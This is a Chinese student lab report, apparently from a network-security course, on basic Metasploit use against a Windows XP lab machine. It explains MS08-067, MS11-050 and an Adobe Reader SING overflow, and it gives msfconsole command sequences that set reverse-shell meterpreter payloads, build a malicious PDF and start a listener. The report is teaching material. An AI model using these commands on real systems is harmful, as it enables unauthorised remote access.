热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

2018-2019~620165107网络对抗技术Exp5MSF基础应用

20165107网络对抗技术Exp5MSF基础应用1.实验内容1.1一个主动攻击实践,如ms08_067(成功)1.2一个针对浏览器的攻击,如ms11_050(成功)1.3一
20165107 网络对抗技术 Exp5 MSF基础应用

1.实验内容

1.1一个主动攻击实践,如ms08_067(成功)

1.2 一个针对浏览器的攻击,如ms11_050(成功)

1.3 一个针对客户端的攻击,如Adobe(成功)

1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功)

 

2.基础问题回答:用自己的话解释什么是exploit,payload,encode.

  • exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中。
  • payload相当于载荷,是我们exploit中shellcode中的主要功能代码,负责执行攻击。
  • Encode用于对payload进行编码,通过修改字符,实现免杀,不让杀软轻易的发现payload是攻击代码。

 

3.实验过程

任务一:一个主动攻击实践——漏洞MS08_067

  • 关于漏洞MS08_067的原理

安全公告:KB958644   时间:2008年底

原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行

详细原理说明:在规范化路径操作中,就是将路径字符串中'/'置换成''以及出去相对路径(例如:'.'),而服务程序在这部分的地址空间检查存在逻辑漏洞,攻击者可以在函数除去“..”字符串时,将路径字符串中的内容复制到路径串之前的地址空间中,覆盖掉返回地址执行shellcode(原理类似我们之前所做的缓冲区溢出攻击)

受影响的操作系统:windows 2000/xp/server 2003/server 2008/vista/7 Beta

  • 攻击过程

靶机:Windows XP SP3 English   IP:192.168.150.135

主机:Kali                                      IP:192.168.150.132

  • 实验步骤

先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块.

再用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload.

 

 

我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置。再使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址).

 接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件.

 

 

任务二:一个针对浏览器的攻击,如ms11_050.

  • 关于漏洞的原理

原理:IE浏览器MSHTML模块在处理无效标签时存在use-after-free漏洞

影响范围:IE Exploer 7 以及 IE Exploer 8

 

  • 攻击过程

靶机:Windows XP SP3 English  IP:192.168.150.135

主机:Kali                                     IP:192.168.150.132

  • 实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.150.132//攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5107//攻击端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5107ky //统一资源标识符路径设置

msf exploit(ms11_050_cobjectelement) > exploit.

 

在访问http://192.168.150.132:8080/5107ky时,可见攻击机出现访问信息.

kali连接成功!

 

任务三:一个针对客户端的攻击Adobe_cooltype_sing.

 

  • 漏洞原理及攻击机型

这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

攻击机:kali   IP:192.168.150.136   靶机:windows XP sp3   IP:192.168.150.135    Adobe:9.3 

  •  实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5107 //攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 5107.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击

可成功生成5107.pdf 

 

 

pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(handler) > set LPORT 5107 //攻击端口固定

msf exploit(handler) > exploit

 

然后在靶机上打开5107.pdf文件

 

kali连接成功!

 

任务四:成功应用任何一个辅助模块——rdp/ms12_020check.

 首先打开辅助模块

找到测试需要的模块:auxiliary/scanner/rdp/ms12_020_check,它的作用是扫描验证目标机是否具有此漏洞,具体步骤如下所示.

经过exploit运行后显示关于漏洞是否可利用是不可靠的

 

 

4.思考题:离实战还缺些什么技术或步骤

本次实验对靶机的版本、对补丁的要求很多,系统均用的是较老的版本,对于现实的攻击情况已经不大适用,要想研究最新的msf攻击技术,就要继续深入学习,掌握更多msf工具,并不断提升自己的代码编程能力。

 

 

5.实验感想

本次实验我对MSF工具进行了基础运用,体会到了msf工具的功能强大,在实验过程中,寻找合适版本的的虚拟机并安装用时较长,在寻找工具过程中,体会到学会查找工具的用途也很重要,如show targets、show payloads等命令。实验过程很有趣,攻击成功有小小的成就感,本次msf基础实验也是为后续实验打基础,接下来还需继续深入学习研究。

 


推荐阅读
  • 在对WordPress Duplicator插件0.4.4版本的安全评估中,发现其存在跨站脚本(XSS)攻击漏洞。此漏洞可能被利用进行恶意操作,建议用户及时更新至最新版本以确保系统安全。测试方法仅限于安全研究和教学目的,使用时需自行承担风险。漏洞编号:HTB23162。 ... [详细]
  • 在Linux系统中,网络配置是至关重要的任务之一。本文详细解析了Firewalld和Netfilter机制,并探讨了iptables的应用。通过使用`ip addr show`命令来查看网卡IP地址(需要安装`iproute`包),当网卡未分配IP地址或处于关闭状态时,可以通过`ip link set`命令进行配置和激活。此外,文章还介绍了如何利用Firewalld和iptables实现网络流量控制和安全策略管理,为系统管理员提供了实用的操作指南。 ... [详细]
  • 本文详细介绍了在 CentOS 7 系统中配置 fstab 文件以实现开机自动挂载 NFS 共享目录的方法,并解决了常见的配置失败问题。 ... [详细]
  • 应用链时代,详解 Avalanche 与 Cosmos 的差异 ... [详细]
  • 网站访问全流程解析
    本文详细介绍了从用户在浏览器中输入一个域名(如www.yy.com)到页面完全展示的整个过程,包括DNS解析、TCP连接、请求响应等多个步骤。 ... [详细]
  • 在JavaWeb开发中,文件上传是一个常见的需求。无论是通过表单还是其他方式上传文件,都必须使用POST请求。前端部分通常采用HTML表单来实现文件选择和提交功能。后端则利用Apache Commons FileUpload库来处理上传的文件,该库提供了强大的文件解析和存储能力,能够高效地处理各种文件类型。此外,为了提高系统的安全性和稳定性,还需要对上传文件的大小、格式等进行严格的校验和限制。 ... [详细]
  • DVWA学习笔记系列:深入理解CSRF攻击机制
    DVWA学习笔记系列:深入理解CSRF攻击机制 ... [详细]
  • 该大学网站采用PHP和MySQL技术,在校内可免费访问某些外部收费资料数据库。为了方便学生校外访问,建议通过学校账号登录实现免费访问。具体方案可包括利用学校服务器作为代理,结合身份验证机制,确保合法用户在校外也能享受免费资源。 ... [详细]
  • 在优化Nginx与PHP的高效配置过程中,许多教程提供的配置方法存在诸多问题或不良实践。本文将深入探讨这些常见错误,并详细介绍如何正确配置Nginx和PHP,以实现更高的性能和稳定性。我们将从Nginx配置文件的基本指令入手,逐步解析每个关键参数的最优设置,帮助读者理解其背后的原理和实际应用效果。 ... [详细]
  • 在 Axublog 1.1.0 版本的 `c_login.php` 文件中发现了一个严重的 SQL 注入漏洞。该漏洞允许攻击者通过操纵登录请求中的参数,注入恶意 SQL 代码,从而可能获取敏感信息或对数据库进行未授权操作。建议用户尽快更新到最新版本并采取相应的安全措施以防止潜在的风险。 ... [详细]
  • 解决针织难题:R语言编程技巧与常见错误分析 ... [详细]
  • 过去查询Mysql的时候,都见3306对所有端口开放着,感觉不安全。netstat -anlp | grep mysqltcp 0&am ... [详细]
  • 在 CentOS 6.4 上安装 QT5 并启动 Qt Creator 时,可能会遇到缺少 GLIBCXX_3.4.15 的问题。这是由于系统中的 libstdc++.so.6 版本过低。本文将详细介绍如何通过更新 GCC 版本来解决这一问题。 ... [详细]
  • 解决Bootstrap DataTable Ajax请求重复问题
    在最近的一个项目中,我们使用了JQuery DataTable进行数据展示,虽然使用起来非常方便,但在测试过程中发现了一个问题:当查询条件改变时,有时查询结果的数据不正确。通过FireBug调试发现,点击搜索按钮时,会发送两次Ajax请求,一次是原条件的请求,一次是新条件的请求。 ... [详细]
  • 本文详细介绍了 InfluxDB、collectd 和 Grafana 的安装与配置流程。首先,按照启动顺序依次安装并配置 InfluxDB、collectd 和 Grafana。InfluxDB 作为时序数据库,用于存储时间序列数据;collectd 负责数据的采集与传输;Grafana 则用于数据的可视化展示。文中提供了 collectd 的官方文档链接,便于用户参考和进一步了解其配置选项。通过本指南,读者可以轻松搭建一个高效的数据监控系统。 ... [详细]
author-avatar
kaga1990_106
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有